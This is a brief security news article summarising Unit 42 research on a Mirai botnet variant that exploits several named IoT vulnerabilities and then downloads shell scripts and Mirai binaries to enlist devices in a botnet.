Security researchers from Palo Alto Networks have discovered another Mirai variant that is targeting new IoT vulnerabilities.
Researchers from Unit 42, the cybersecurity division of Palo Alto Networks, discovered a number of attacks that leveraged vulnerabilities including:
- VisualDoor (a SonicWall SSL-VPN exploit)
- CVE-2020-25506 (a D-Link DNS-320 firewall exploit)
- CVE-2020-26919 (a Netgear ProSAFE Plus exploit)
- Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit)
- Three other IoT vulnerabilities yet to be identified
Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviours such as downloading and executing Mirai variants and brute-forcers.
The researchers found that one of the IPs involved in the attack to take advantage of two newer vulnerabilities – CVE-2021-27561 and CVE-2021-27562 – which exploit the Yealink DM platform and enable an unauthenticated attacker to run commands on the server with root privileges.
Unit 42 detected the addition of a further exploit that takes advantage of CVE-2020-26919—a vulnerability that affected NETGEAR JGS516PE devices.
‘The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,’ the researchers added.
In this case, compromised devices download Mirai malware binaries which adds them to a larger IoT botnet capable of carrying out network attacks on devastating scales.
Given the rapid proliferation of IoT devices – with IDC estimating there will be 41.6 billion connected IoT devices by 2025 – and their often weak security, future attacks will likely dwarf that of the one carried out against Dyn.